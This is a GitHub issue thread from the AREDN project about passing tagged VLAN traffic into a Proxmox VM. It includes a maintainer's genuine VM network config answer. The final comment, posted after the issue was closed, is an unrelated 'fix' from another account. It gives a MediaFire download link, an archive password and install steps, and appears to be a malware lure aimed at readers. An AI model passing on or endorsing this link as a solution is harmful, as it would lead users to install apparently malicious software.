aredn/aredn #1436: Passing vlan2 onto PVE

kodiakastu, 2024-08-31:
Hi. I'm trying to find how to "export" the DtD thru proxmox. I'm unable to find a way to get tagged traffic out of my vms.

I have multiple vlans on my systems, but usually I'm passing tagged from proxmox to untagged on my vm. If I try to get/send traffic on tagged vlans on my vms, the traffic does not seem to get out correctly.

I tried to google this, but it always refers to the main network setup and never to the vm. I confirmed with 2 other nodes on the switch and they can see themselves, but never the vm.

I'm sure I'm missing something. Was somebody able to get tagged DtD traffic out of a VM and how was it configured to be able to that?

Thanks alot!

aanon4, 2024-08-31:
So this is a proxmox question rather than an AREDN one, so you might do better on their forums.  But this is the network configuration for one of my VM:

```net0: virtio=B2:86:B1:69:63:72,bridge=vmbr0,tag=110,trunks=2;111;1100```

Which maps VLAN 110 to untagged in my VM, while passing through 2, 111 and 1100 directly. There is no UI for this in Proxmox so you have to change it by hand in the appropriate VM configuration file.

closed 2024-08-31 by aanon4

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx